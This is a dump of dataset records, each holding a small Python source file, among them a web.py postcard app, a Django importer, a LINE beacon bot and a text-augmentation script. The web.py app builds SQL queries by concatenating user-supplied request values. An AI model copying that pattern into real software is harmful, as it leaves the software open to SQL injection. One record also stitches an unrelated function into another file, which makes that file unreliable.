self._config\n for p in path:\n if config:\n config = config.get(p)\n return json.dumps(config,indent=2,separators=(',',' == '))\n","sub_path":"Learning/Contests/HackerEarth/ChipMonk/config_loader.py","file_name":"config_loader.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"20254900","text":"# -*- mode: python; coding: utf-8 ; python-indent: 2 -*-\nimport sys\nimport os,sys\nimport eso_utils as ue\nimport of as player\n\nclass Logic:\n\tdef __init__(self, esono):\n\t\tself.esono = esono\n\t\tself.esono.logic = self\n\t\tself.player = None\n\t\tif self.esono.setplayer=='of':\n\t\t\tself.player = 
player.Player(esono=esono)\n\t\t\tself.esono.player = self.player\n\t\t\tself.AUTOPLAY = False # play next on\n\n\tdef stop(self, elt=None):\n\t\tself.player.stop(next=False)\n\t\t#self.esono.gui.cur_list.rm_tag('played')\n\n\tdef play_file_from_start(self, path):\n\t\tself.player.stop()\n\t\tself.player.play_file(path)\n\n\tdef load_file(self, path):\n\t\t#! check if file exists\n\t\t#! check if mimetype is supported\n\t\t# check if file already loaded\n\t\tif self.player.path == path: return True\n\t\tself.player.load(path)\n\t\treturn True\n\n\t# def play(self, path=''):\n\t# \tif not path: \n\t# \t\tself.player.play()\n\t# \t\treturn True\n\t# \tif not self.load(melt): return False\n\t# \tself.player.play()\n\t# \tself.AUTOPLAY = True\n\t# \treturn True\n\n\t# def play_from_start(self):\n\t# \tself.player.set_pos01(0.)\n\t# \tself.player.play()\n\t# \treturn True\n\n\t# def pause(self):\n\t# \tself.player.pause()\n\n\t# def play_pause(self, melt):\n\t# \tif not self.load(melt): return False\n\t# \tself.player.play_pause()\n\t# \tself.AUTOPLAY = True\n\t# \treturn True\n\n\tdef set_dur_sec(self, dur_sec):\n\t\t# self.melt_played.pjson.set_dur_sec(dur_sec)\n\t\tpass\n\n\tdef play_pos01(self, melt, pos01):\n\t\tif self.melt_played!= melt: self.play(melt)\n\t\tself.player.set_pos01(pos01)\n\t\treturn True\n\n\tdef pause_pos01(self, melt, pos01):\n\t\tif self.melt_played!= melt: self.load(melt)\n\t\tself.player.pause()\n\t\tself.player.set_pos01(pos01)\n\t\treturn True\n\n\tdef play_auto(self, sens):\n\t\tue.mezz('play_auto')\n\t\tif not self.AUTOPLAY: return\n\t\tmelt = self.melt_played\n\t\tif not melt in self.esono.mpaths: return\n\t\tmelts = self.esono.mpaths\n\t\tcl = self.esono.gui.cur_list\n\t\tid = melts.index(melt)\n\t\tif sens=='next':\n\t\t\tif cl.nl_selected>cl.nl_played: id = cl.nl_selected-1\n\t\t\telse:\n\t\t\t\tif id==len(melts)-1: id=0\n\t\t\t\telse: id+=1\n\t\telif sens=='prev':\n\t\t\tif id<0: id=len(melts)-1\n\t\t\telse: id-=1\n\t\tmelt = self.esono.mpaths[id]\n\t\tself.play_pause(melt)\n\t\tue.mezz(melt.name)\n\t\tcl.setline_played(id+1)\n","sub_path":"zzlogic.py","file_name":"zzlogic.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"583018125","text":"from logging import Formatter, getLogger, StreamHandler, DEBUG\nlogger = getLogger(__name__)\nhandler = StreamHandler()\nhandler.setLevel(DEBUG)\nhandler.setFormatter(Formatter(\"%(asctime)s- %(name)s - %(levelname)s - %(message)s\"))\nlogger.setLevel(DEBUG)\nlogger.addHandler(handler)\n\nimport requests\nimport json\nimport more_itertools\n\nclass BulkImportHandler(object):\n\n def __init__(self, model, contents):\n self.model = model\n self.model_name = model._meta.model_name\n self.model_fields = [field.name for field in model._meta.fields]\n self.contents = self._clean_bulk_contents(contents)\n\n def update(self, n=1000):\n self.model.objects.all().delete()\n for sublist in more_itertools.chunked([ self.model(**content) for content in self.contents ], n):\n self.model.objects.bulk_create(sublist)\n\n def _clean_bulk_contents(self, contents):\n return [ self._clean(pk+1, content) for pk, content in enumerate(contents) ]\n\n def _clean(self, pk, content):\n content = requests.structures.CaseInsensitiveDict(content)\n cleaned_content = dict()\n cleaned_content['pk'] = pk\n for field_name in self.model_fields:\n try:\n cleaned_content[field_name] = content[field_name]\n except KeyError:\n pass\n return 
cleaned_content\n","sub_path":"bulk_import_handler.py","file_name":"bulk_import_handler.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"39610175","text":"import os\n\nimport sae\nimport web\nimport random\nimport uuid\nimport json\n\ndb = web.database(dbn='mysql', port=int(sae.const.MYSQL_PORT), host=sae.const.MYSQL_HOST, db=sae.const.MYSQL_DB, user=sae.const.MYSQL_USER, pw=sae.const.MYSQL_PASS) \nrender = web.template.render('templates/')\n\nurls = (\n '/work/(.*)', 'Work',\n '/make/(.*)', 'Make',\n '/pic(.*)', 'Pic',\n '/video(.*)', 'Video',\n '/create(.*)', 'Create'\n)\n\nweb.config.debug = True\n\napp_root = os.path.dirname(__file__)\ntemplates_root = os.path.join(app_root, 'templates')\nrender = web.template.render(templates_root)\n\nclass Work:\n def GET(self, name):\n \n uri = web.ctx.path\n params = uri.split(\"/\")[2:]\n \n if web.cookies().get('redirect') != \"true\":\n web.setcookie(\"redirect\", \"true\", expires=24, domain=None, secure=False)\n raise web.seeother('/work/'+params[0]+'/'+params[1]+'/' + str(uuid.uuid4()))\n else:\n web.setcookie(\"redirect\", \"\", expires=24, domain=None, secure=False)\n \n creatorID = 0\n try:\n creatorID = int(params[0])\n except ValueError:\n creatorID = 0\n workID = 0\n try:\n workID = int(params[1])\n except ValueError:\n creatorID = 0\n imgID = 1\n msg = \"\"\n result = db.query(\"select `image_id` as iid, `text` from `work` where `work_id` = '\"+str(workID)+\"' and `creator_id` = '\"+str(creatorID)+\"'\")\n results = list(result)\n if len(results) == 0:\n imgID = 1\n else:\n imgID = int(results[0]['iid'])\n msg = results[0]['text']\n \n return render.work(str(imgID)+\".png\", str(imgID)+\"c.png\", msg)\n \n####### \n referer = web.ctx.env.get('HTTP_REFERER', '')\n host = web.ctx.homedomain\n ip = web.ctx.ip\n info[\"referer\"] = referer\n info[\"host\"] = host\n info[\"uri\"] = uri\n info[\"ip\"] = ip\n info[\"cookie\"] = web.cookies().get('redirect')\n if web.cookies().get('redirect') != \"true\":\n web.setcookie(\"redirect\", \"true\", expires=24, domain=None, secure=False)\n raise web.seeother('/work/'+info[\"param\"][0]+'/'+info[\"param\"][1]+'/' + str(uuid.uuid4()))\n else:\n web.setcookie(\"redirect\", \"\", expires=24, domain=None, secure=False)\n return render.test(info)\n\nclass Pic:\n def GET(self, name):\n return render.pic()\n\nclass Video:\n def GET(self, name):\n return render.video()\n\nclass Create:\n def POST(self, name):\n data = web.data()\n ds = data.split(\"&\");\n info = {\"img\":\"1\",\"qq\":\"0\",\"message\":\"Hello world.\"}\n for d in ds:\n s = d.split(\"=\")\n info[s[0]] = s[1]\n creatorID = 0\n result = db.query(\"select `creator_id` as id from creator where `qq`= '\"+info['qq']+\"'\") \n results = list(result)\n if len(results) <= 0:\n creatorID = db.insert('creator', qq=info['qq'])\n else:\n creatorID = results[0]['id']\n imageID = 1\n try:\n imageID = int(info['img'])\n except ValueError:\n imageID = 1\n if imageID < 1 or imageID > 8:\n imageID = 1\n workID = db.insert('work', image_id=str(imageID), text=info[\"message\"], creator_id=str(creatorID))\n web.setcookie(\"redirect\", \"true\", expires=24000, domain=None, secure=False)\n return json.dumps({\"creator_id\": str(creatorID), \"work_id\": str(workID), \"uuid\": str(uuid.uuid4())}, sort_keys=True)\n\nclass Make:\n def GET(self, name):\n uri = web.ctx.path\n strsp = uri.split(\"/\");\n imgID = 1\n try:\n imgID = int(strsp[2])\n except ValueError:\n 
imgID = 1\n return render.make(str(imgID)+\".png\", str(imgID)+\"c.png\")\n\napp = web.application(urls, globals()).wsgifunc()\n\napplication = sae.create_wsgi_app(app)","sub_path":"微信明信片722工程代码/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"47852062","text":"def piramide(x):\n\t\"\"\" 1\n\t\t2\t2\n\t\t3\t3\t3\"\"\"\n\tfor i in range(1,x+1):\n\t\tlst = [i]\n\t\tj = 1\t\t\t\n\t\twhile j < i:\n\t\t\tlst.append(i)\n\t\t\tj+=1\t\t\t\n\t\tprint (lst)\n\t\t\nx = int(input('Informe um numero: '))\npiramide(x)\n\t\t\t\n\t\n","sub_path":"matheus.tanaques/exerciciosComFuncoes/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"438971842","text":"import logging\n\nfrom django.conf import settings\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.core.urlresolvers import reverse_lazy\n\nfrom horizon import tables\nfrom horizon import messages\nfrom horizon import forms\n\nfrom openstack_auth_shib.models import Registration\nfrom openstack_auth_shib.models import Project\nfrom openstack_auth_shib.models import PrjRequest\n\nfrom openstack_auth_shib.models import PSTATUS_REG\nfrom openstack_auth_shib.models import PSTATUS_PENDING\nfrom openstack_auth_shib.models import PSTATUS_APPR\nfrom openstack_auth_shib.models import PSTATUS_REJ\n\nfrom .tables import SubscriptionTable\nfrom .forms import ApproveSubscrForm\n\nLOG = logging.getLogger(__name__)\n\nclass PrjReqItem:\n def __init__(self, prjReq):\n self.regid = prjReq.registration.regid\n self.username = prjReq.registration.username\n self.givenname = prjReq.registration.givenname\n self.sn = prjReq.registration.sn\n self.notes = prjReq.notes\n \n\nclass IndexView(tables.DataTableView):\n table_class = SubscriptionTable\n template_name = 'project/subscription_manager/subscr_manager.html'\n\n def get_data(self):\n \n reqList = list()\n \n try:\n #\n # TODO paging\n #\n curr_prjname = self.request.user.tenant_name\n q_args = {\n 'project__projectname' : curr_prjname,\n 'flowstatus' : PSTATUS_PENDING\n }\n for p_entry in PrjRequest.objects.filter(**q_args):\n reqList.append(PrjReqItem(p_entry))\n \n except Exception:\n messages.error(self.request, _('Unable to retrieve subscription list.'))\n\n return reqList\n\n\nclass ApproveView(forms.ModalFormView):\n form_class = ApproveSubscrForm\n template_name = 'project/subscription_manager/subscr_approve.html'\n success_url = reverse_lazy('horizon:project:subscription_manager:index')\n \n def get_object(self):\n if not hasattr(self, \"_object\"):\n try:\n\n regid = int(self.kwargs['regid'])\n curr_prjname = self.request.user.tenant_name\n q_args = {\n 'project__projectname' : curr_prjname,\n 'registration__regid' : regid\n }\n self._object = PrjReqItem(PrjRequest.objects.filter(**q_args)[0])\n \n except Exception:\n LOG.error(\"Subscription error\", exc_info=True)\n self._object = None\n\n return self._object\n\n def get_context_data(self, **kwargs):\n context = super(ApproveView, self).get_context_data(**kwargs)\n context['regid'] = int(self.kwargs['regid'])\n\n if not self.get_object():\n context['subscr_err'] = _(\"Cannot retrieve user's data from database.\")\n context['contacts'] = settings.MANAGERS\n \n return context\n\n def get_initial(self):\n \n if not self.get_object():\n return dict()\n \n return {\n 'regid' : 
self.get_object().regid,\n            'username' : self.get_object().username,\n            'givenname' : self.get_object().givenname,\n            'sn' : self.get_object().sn,\n            'notes' : self.get_object().notes\n        }\n\n","sub_path":"src/subscription_manager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"145348840","text":"#!/usr/bin/python\r\nimport os, random\r\n\r\n\r\n\r\ndef parseLine( numExec, fo, line, separator, startTotal, endTotal, timeStep ):\r\n    splittedLine = line.split(separator)\r\n    # if id already registered we need to skip this part\r\n    idSite = splittedLine[0]\r\n    name = splittedLine[1]\r\n    x = splittedLine[2]\r\n    y = splittedLine[3]\r\n    period = splittedLine[4]\r\n    i = 5\r\n    exist = 0\r\n    #fo.write(idSite+separator+name+separator+x+separator+y+separator+period+separator)\r\n    #Case A: site is multi-phased\r\n    if int(period) == 13:\r\n        numPhases = 0 #placeholder, need to make multiphaseSites.csv\r\n        phase = 1\r\n        currentStep = startTotal\r\n        fo.write(idSite+\"00\"+str(phase)+separator+name+separator+x+separator+y+separator+period+separator)\r\n        \r\n        print(\"Simulating multi-phased site: \" + str(name) + \", phase \" + str(phase) + \", for execution: \" + str(numExec+1) )\r\n        print(\"Starting from time-step: \" + str(startTotal))\r\n        \r\n        for i in range(numPhases):\r\n            for step in range (currentStep, endTotal, -timeStep):\r\n                weight = float(splittedLine[i]) \r\n                \r\n                token = separator \r\n                if step==endTotal+timeStep:\r\n                    token = '\\n'\r\n                    exist = 1\r\n                    fo.write(str(exist)+token) # Only the existence of a site is being investigated. It can be assumed that the site existed at least in the last step.\r\n                else:\r\n                    if exist == 1:\r\n                        fo.write(str(exist)+token)\r\n                    else: \r\n                        if weight > 0.0:\r\n                            #print 'site: ' + name + ' contributing with weight: ' + str(weight) + ' to time step: ' + str(timeStep)\r\n                            if random.random() < weight:\r\n                                exist = 1\r\n                            fo.write(str(exist)+token)\r\n    #Case B: site is single-phased\r\n    else:\r\n        fo.write(idSite+separator+name+separator+x+separator+y+separator+period+separator)\r\n        for step in range (startTotal, endTotal, -timeStep):\r\n            weight = float(splittedLine[i]) \r\n            \r\n            token = separator \r\n            if step==endTotal+timeStep:\r\n                token = '\\n'\r\n                exist = 1\r\n                fo.write(str(exist)+token)\r\n            else:\r\n                if exist == 1:\r\n                    fo.write(str(exist)+token)\r\n                else: \r\n                    if weight > 0.0:\r\n                        #print 'site: ' + name + ' contributing with weight: ' + str(weight) + ' to time step: ' + str(timeStep)\r\n                        if random.random() < weight:\r\n                            exist = 1\r\n                        fo.write(str(exist)+token)\r\n\r\ndef numberOfPainters(arr, n, maxLen): \r\n\ttotal = 0\r\n\tnumPainters = 1\r\n\r\n\tfor i in arr: \r\n\t\ttotal += i \r\n\r\n\t\tif (total > maxLen): \r\n\r\n\t\t\t# for next count \r\n\t\t\ttotal = i \r\n\t\t\tnumPainters += 1\r\n\tprint(numPainters, \"num\")\r\n\treturn numPainters \r\n\r\ndef partition(arr, n, k): \r\n\tlo = max(arr) \r\n\thi = sum(arr) \r\n\r\n\twhile (lo < hi): \r\n\t\t\r\n\t\tmid = lo + (hi - lo) // 2\r\n\t\tprint(lo, mid, hi)\r\n\t\t\r\n\t\trequiredPainters = numberOfPainters(arr, n, mid) \r\n\r\n\t\t# find better optimum in lower half \r\n\t\t# here mid is included because we \r\n\t\t# may not get anything better \r\n\t\tif (requiredPainters <= k): \r\n\t\t\thi = mid \r\n\r\n\t\t# find better optimum in upper half \r\n\t\t# here mid is excluded because it gives \r\n\t\t# required Painters > k, which is invalid \r\n\t\telse: \r\n\t\t\tlo = mid + 1\r\n\r\n\t# required \r\n\treturn lo \r\n\r\n# Driver code \r\narr = [1, 2, 3, 4, 5, 6, 7, 8, 9] \r\nprint(sum(arr))\r\nn = len(arr) \r\nk = 2\r\nprint(int(partition(arr, n, k))) \r\n","sub_path":"(binary search appl.)painters_problem.py","file_name":"(binary search appl.)painters_problem.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"497225955","text":"import os\nimport pandas as pd\nimport numpy as np\nfrom tqdm import tqdm\nfrom sklearn.model_selection import train_test_split\n\n\nnp.random.seed(42)\nPUNCTUATIONS = ['.', ',', '!', '?', ';', ':']\nPUNC_RATIO = 0.3\nHASH_VALUE_SUB = &#13;
'@#$%@@#$%#'\nHASH_VALUE_OBJ = '&$^&#$%^#@'\nNUM_AUGS = [1, 2, 4]\nTRAIN_PATH = \"/opt/ml/dataset/train/train.csv\"\nDATASET_PATH = \"/opt/ml/dataset\"\n\n\ndef encode_words(sentence, start_s, end_s, start_o, end_o):\n '''\n entity를 HASH_VALUE로 대체, [start_idx:end_idx+1]까지의 글자를 바꿈\n '''\n if start_s > start_o:\n sentence = sentence[:start_s] + HASH_VALUE_SUB + sentence[end_s+1:]\n sentence = sentence[:start_o] + HASH_VALUE_OBJ + sentence[end_o+1:]\n else :\n sentence = sentence[:start_o] + HASH_VALUE_OBJ + sentence[end_o+1:]\n sentence = sentence[:start_s] + HASH_VALUE_SUB + sentence[end_s+1:] \n \n return sentence\n\n\ndef insert_punctuation(sentence, punc_ratio=PUNC_RATIO):\n '''\n ratio만큼 PUNCTATIONS를 sentence에 랜덤으로 추가\n '''\n words = sentence.split(' ')\n new_line = []\n q = np.random.randint(1, int(punc_ratio * len(words) + 1)) \n qs = np.random.choice(range(0, len(words)), q)\n \n for j, word in enumerate(words):\n if j in qs:\n new_line.append(PUNCTUATIONS[np.random.randint(0, len(PUNCTUATIONS) - 1)])\n new_line.append(word)\n else:\n new_line.append(word)\n new_line = ' '.join(new_line)\n\n return new_line\n\n\ndef change_index(sentence, word_s, word_o, len_s, len_o, type_s, type_o):\n '''\n 증강된 문장의 개체 index를 재설정\n '''\n sub_index = []\n obj_index = []\n\n sub_index.append(str(sentence.find(HASH_VALUE_SUB)))\n sub_index.append(str(sentence.find(HASH_VALUE_SUB) + len_s - 1))\n sentence = sentence.replace(HASH_VALUE_SUB, word_s, 1)\n \n obj_index.append(str(sentence.find(HASH_VALUE_OBJ)))\n obj_index.append(str(sentence.find(HASH_VALUE_OBJ) + len_o - 1))\n sentence = sentence.replace(HASH_VALUE_OBJ, word_o, 1)\n \n entity_sub = \"{'word': '\" + word_s + \"', 'start_idx': \" + sub_index[0] + \", 'end_idx': \" + sub_index[1] + \", 'type': '\" + type_s + \"'}\"\n entity_obj = \"{'word': '\" + word_o + \"', 'start_idx': \" + obj_index[0] + \", 'end_idx': \" + obj_index[1] + \", 'type': '\" + type_o + \"'}\"\n\n return sentence, entity_sub, entity_obj\n \n\ndef insert_punc_and_change_index(data_row):\n '''\n encode_words, insert_punctuation, change_index, merge to pd.Series\n '''\n word_s, start_s, end_s, type_s = list(eval(data_row[\"subject_entity\"]).values())\n word_o, start_o, end_o, type_o = list(eval(data_row[\"object_entity\"]).values())\n len_s = len(word_s)\n len_o = len(word_o)\n\n encoded_sentence = encode_words(data_row['sentence'], start_s, end_s, start_o, end_o) \n new_sentence = insert_punctuation(encoded_sentence) \n new_sentence, entity_sub, entity_obj = change_index(new_sentence, word_s, word_o, len_s, len_o, type_s, type_o) \n \n data_row['sentence'] = new_sentence\n data_row['subject_entity'] = entity_sub\n data_row['object_entity'] = entity_obj\n\n return data_row\n\n\ndef main(data_train, data_val, aug):\n '''\n 주어진 dataframe에 AEDA 데이터 증강을 적용하기 위한 함수\n '''\n aug_train = pd.DataFrame()\n aug_val = pd.DataFrame()\n\n for _ in range(aug):\n train_new = data_train.apply(lambda x: insert_punc_and_change_index(x), axis=1) \n val_new = data_val.apply(lambda x: insert_punc_and_change_index(x), axis=1) \n\n aug_train = pd.concat([aug_train, train_new], axis=0)\n aug_val = pd.concat([aug_val, val_new], axis=0)\n\n aug_train.reset_index(inplace=True, drop=True)\n aug_val.reset_index(inplace=True, drop=True)\n\n return aug_train, aug_val\n\n\ndef iterate_main(path):\n '''\n split train, val set and duplicate if needed\n '''\n orig_df = pd.read_csv(path)\n\n for aug in tqdm(NUM_AUGS):\n df_train, df_val = train_test_split(orig_df, test_size=0.2, random_state=42, 
stratify=orig_df[\"label\"])\n new_df_train, new_df_val = main(df_train, df_val, aug)\n final_df_train = pd.concat([df_train, new_df_train], axis=0)\n final_df_val = pd.concat([df_val, new_df_val], axis=0)\n\n os.makedirs(f\"{DATASET_PATH}/aeda_{aug}_dataset\", exist_ok=True)\n os.makedirs(f\"{DATASET_PATH}/aeda_{aug}_dataset/train\", exist_ok=True)\n \n final_df_train.to_csv(f\"{DATASET_PATH}/aeda_{aug}_dataset/train/train.csv\", header=True, index=False)\n final_df_val.to_csv(f\"{DATASET_PATH}/aeda_{aug}_dataset/train/valid.csv\", header=True, index=False)\n\n\nif __name__ == \"__main__\":\n iterate_main(TRAIN_PATH)\n","sub_path":"data_augmentation/aeda_val_split.py","file_name":"aeda_val_split.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"279223284","text":"# Linux-specific implementation (specifically >= 2.6.21), although the clock_getxxx are POSIX.\n# See more with man clock_gettime and man 7 time\n\nimport ctypes\nfrom ctypes import CDLL, Structure, c_int64, c_int32, c_long, byref\nfrom sysconfig import get_config_var\n\n__all__ = ['monotonic_clock', 'time_to_monotonic', 'time_from_monotonic']\n\nCLOCK_REALTIME = 0\nCLOCK_MONOTONIC = 1\nCLOCK_MONOTONIC_RAW = 4\n\n_rtlib = None\n_time_t = None\n_timespec_t = None\n\nSEC_IN_NSEC = 10**9\n\n\ndef _check_ctypes_errno():\n # Python 2.7.2+ (default, Oct 4 2011, 20:06:09)\n # [GCC 4.6.1] on linux2\n # >>> import ctypes\n # >>> ctypes.get_errno\n # Traceback (most recent call last):\n # File \"\", line 1, in \n # AttributeError: 'module' object has no attribute 'get_errno'\n try:\n get_errno = ctypes.get_errno\n except AttributeError:\n raise NotImplementedError(\"system doesn't have ctypes.get_errno, happens on an old ubuntu\")\n\n\ndef _init_library():\n global _rtlib, _time_t, _timespec_t\n\n _time_t = c_int64 if get_config_var(\"SIZEOF_TIME_T\") == 8 else c_int32\n\n class timespec_t(Structure):\n _fields_ = [(\"tv_sec\", _time_t), (\"tv_nsec\", c_long)]\n\n _timespec_t = timespec_t\n\n _check_ctypes_errno()\n\n try:\n _rtlib = CDLL(\"librt.so\")\n except OSError:\n raise NotImplementedError(\"system doesn't support high resolution timers (librt.so not found)\")\n\n # First we need to see that the clock we want is supported.\n # See man 7 time: High-Resolution Timers\n if _rtlib.clock_getres(CLOCK_MONOTONIC_RAW, 0) != 0:\n raise NotImplementedError(\"system doesn't support high resolution timers or monotonic clock\")\n\n\ndef monotonic_clock():\n if not _rtlib:\n _init_library()\n\n timespec = _timespec_t()\n if _rtlib.clock_gettime(CLOCK_MONOTONIC_RAW, byref(timespec)) != 0:\n raise OSError(ctypes.get_errno(), \"clock_gettime failed\")\n\n return timespec.tv_nsec + (timespec.tv_sec * SEC_IN_NSEC)\n\n\ndef time_to_monotonic(time):\n return int(time * SEC_IN_NSEC)\n\n\ndef time_from_monotonic(clock):\n return clock / float(SEC_IN_NSEC)\n","sub_path":"src/infi/monotonic_time/linux.py","file_name":"linux.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"441708157","text":"# 做为 Apple Store App 独立开发者,你要搞限时促销,为你的应用生成激活码(或者优惠券),使用 Python 如何生 # 成 200\n# 个激活码(或者优惠券)?\n\nimport uuid\n\n\ndef create_code(num=200):\n codes = []\n while True:\n code = str(uuid.uuid1()).replace('-', '')\n if not code in codes:\n codes.append(code)\n if len(codes) is num:\n break\n return codes\n\n\nif __name__ == '__main__':\n 
create_code()\n","sub_path":"python_daily/test_0002/python_0002.py","file_name":"python_0002.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"115950794","text":"import math\nfrom src.simSettings import Settings\nimport random\nfrom src.updatable import Updatable\nimport json\n\n\"\"\"\noccupations: producer, distributor\n producer:\n distributor:\n\n\n\"\"\"\n# the default state of new Pops\ndefaultState = {\n 'occupation': 'producer',\n 'demands': {},\n 'supplies': {},\n 'money': 0,\n 'producing': '',\n}\nmarketInfo = {}\nwith open(\"src/marketStart.json\") as f:\n marketInfo = json.load(f)\n# state[\"demands\"] gets filled by all product's \"defaultDemand\"\n# supplies gets filled with 0\nfilledProducing = False\nfor key in marketInfo:\n if not filledProducing:\n defaultState[\"producing\"] = key\n filledProducing = True\n defaultState[\"demands\"][key] = marketInfo[key][\"defaultDemand\"]\n defaultState[\"supplies\"][key] = 0\n\nclass Pop(Updatable):\n def __init__(self, popSize: int):\n super().__init__()\n self.popSize = popSize\n self.state = defaultState\n\n # Override\n def update(self, sim):\n if self.state['occupation'] == \"producer\":\n # use up supplies bought last turn\n self.useSupplies(sim)\n # adjust what's being produced, then produce things\n self.adjustProduction(sim)\n self.produceItems(sim)\n # sell things\n self.itemsToMarket(sim)\n # buy new items\n self.buyNeeds(sim)\n # grow pop\n self.popSize = self.popSize + (self.popSize * Settings.popGrowthRate)\n\n def useSupplies(self, sim):\n for key in self.state[\"demands\"]:\n self.state[\"supplies\"][key] -= self.state[\"demands\"][key]\n if self.state[\"supplies\"][key] < 0:\n # health/happiness effects\n pass\n self.state[\"supplies\"][key] = self.state[\"supplies\"][key] if self.state[\"supplies\"][key] > 0 else 0\n\n def adjustProduction(self, sim):\n # to prevent overcompensation within single ticks, this will only happen occasionally\n if (random.uniform(0,1) <= Settings.productionSwapLikelyhood):\n expectedReturns = {}\n for key in sim.market.products:\n expectedReturns[key] = sim.market.valueOf( (key, self.amountProduced(sim, key) ))\n\n bestChoice = \"\"\n for product in expectedReturns:\n if (bestChoice == \"\"):\n bestChoice = product\n else:\n if expectedReturns[bestChoice] < expectedReturns[key]:\n bestChoice = product\n self.state['producing'] = bestChoice\n\n # amount pop could produce of this product\n def amountProduced(self, sim, productName: str):\n return self.popSize * sim.market.getProduct(productName)[\"production\"]\n\n # amount pop will need based on its size and demands\n def amountNeeded(self, sim, productName: str):\n return self.popSize * self.state[\"demands\"][productName]\n\n def produceItems(self, sim):\n product = self.state[\"producing\"]\n amount = self.amountProduced(sim, product)\n self.state[\"supplies\"][product] += amount\n\n # put the items on the market\n def itemsToMarket(self, sim):\n for product in self.state[\"supplies\"]:\n if self.state[\"supplies\"][product] > 0:\n # sell everything\n self.sellProduct(sim, product, self.state[\"supplies\"][product])\n\n def buyNeeds(self, sim):\n for product in self.state[\"demands\"]:\n if self.state[\"demands\"][product] > 0:\n self.buyProduct(sim, product, self.amountNeeded(sim, product))\n\n def sellProduct(self, sim, productName: str, amount):\n productSellOrder = (self, productName, amount)\n #sim.market.addItems(productSellOrder)\n 
#self.state[\"supplies\"][productName] -= amount\n        #self.state[\"money\"] += sim.market.valueOf(productSellOrder)\n        sim.market.addSellOrder(productSellOrder)\n\n    def buyProduct(self, sim, productName: str, amount):\n        productBuyOrder = (self, productName, amount)\n        #sim.market.removeItems(productBuyOrder)\n        #self.state[\"supplies\"][productName] += amount\n        #self.state[\"money\"] -= sim.market.valueOf(productBuyOrder)\n        sim.market.addBuyOrder(productBuyOrder)\n\n    def getWeight(self):\n        return self.popSize","sub_path":"src/pop.py","file_name":"pop.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"649027383","text":"from UserData import UserData\n\nfrom linebot.models import (\n    MessageEvent, TextMessage, TextSendMessage,\n    SourceUser, SourceGroup, SourceRoom,\n    TemplateSendMessage, ConfirmTemplate, MessageAction,\n    PostbackAction,\n)\n\nfrom linebot import (\n    LineBotApi, WebhookHandler\n)\n\n\"\"\"\nLINE beacon settings and configuration are handled here.\nuser_data.json_data['use_line_beacon'] {0: not set, 1: on, 2: off}\n\"\"\"\nclass BeaconWhisperEvent:\n\n    def __init__(\n            self,\n            line_bot_api,\n            userData):\n        self.__user_data = userData\n        self.__line_bot_api = line_bot_api\n\n    def activation_msg(self, event):\n        # When a LINE beacon connects, start the setup flow if the state is 0 (not set)\n        self.__user_data.load()\n        if self.__user_data.json_data['use_line_beacon'] == 0:\n            confirm_template = ConfirmTemplate(text=\"LINE beacon が接続されたようです。Beacon Ecoを使用しますか?\\nこれを用いることでスマホがビーコンから遠くにあるときはセンサを省エネ化し、センサ寿命を延ばすことができます。\\nbeacon と話しかけると設定を変更できます。\", actions=[\n                PostbackAction(label='はい', data='set_beacon_on', displayText='はい!'),\n                PostbackAction(label='いいえ', data='set_beacon_off', displayText='いいえ'),\n            ])\n            template_message = TemplateSendMessage(\n                alt_text='Confirm alt text', template=confirm_template)\n            self.__line_bot_api.reply_message(event.reply_token, template_message)\n\n\n    def set_beacon(self, event):\n        # Toggle the beacon between on and off\n        react = event.postback.data\n        if react == 'set_beacon_on':\n            self.__user_data.set_use_line_beacon(1)\n            self.__line_bot_api.reply_message(\n                event.reply_token,\n                TextSendMessage(\n                    text='Beacon EcoをONに設定しました'\n                )\n            )\n        elif react == 'set_beacon_off':\n            self.__user_data.set_use_line_beacon(2)\n            self.__line_bot_api.reply_message(\n                event.reply_token,\n                TextSendMessage(\n                    text='Beacon EcoをOFFに設定しました'\n                )\n            )\n        else:\n            pass\n\n    # Manually configure whether to use the beacon\n    def config_beacon_msg(self, event):\n        confirm_template = ConfirmTemplate(text=\"LINE beacon Ecoの設定を行います。Beacon Ecoを使用しますか?\\nこれを用いることでスマホがビーコンから遠くにあるときはセンサを省エネ化し、センサ寿命を延ばすことができます。\\nbeacon と話しかけると設定を変更できます。\", actions=[\n            PostbackAction(label='はい', data='set_beacon_on', displayText='はい'),\n            PostbackAction(label='いいえ', data='set_beacon_off', displayText='いいえ'),\n        ])\n        template_message = TemplateSendMessage(\n            alt_text='Confirm alt text', template=confirm_template)\n        self.__line_bot_api.reply_message(event.reply_token, template_message)\n\n    def readBeaconConfig(self):\n        if self.__user_data.json_data['use_line_beacon'] == 1:\n            return True\n        else:\n            return False","sub_path":"whisper/beaconWhisperEvent.py","file_name":"beaconWhisperEvent.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
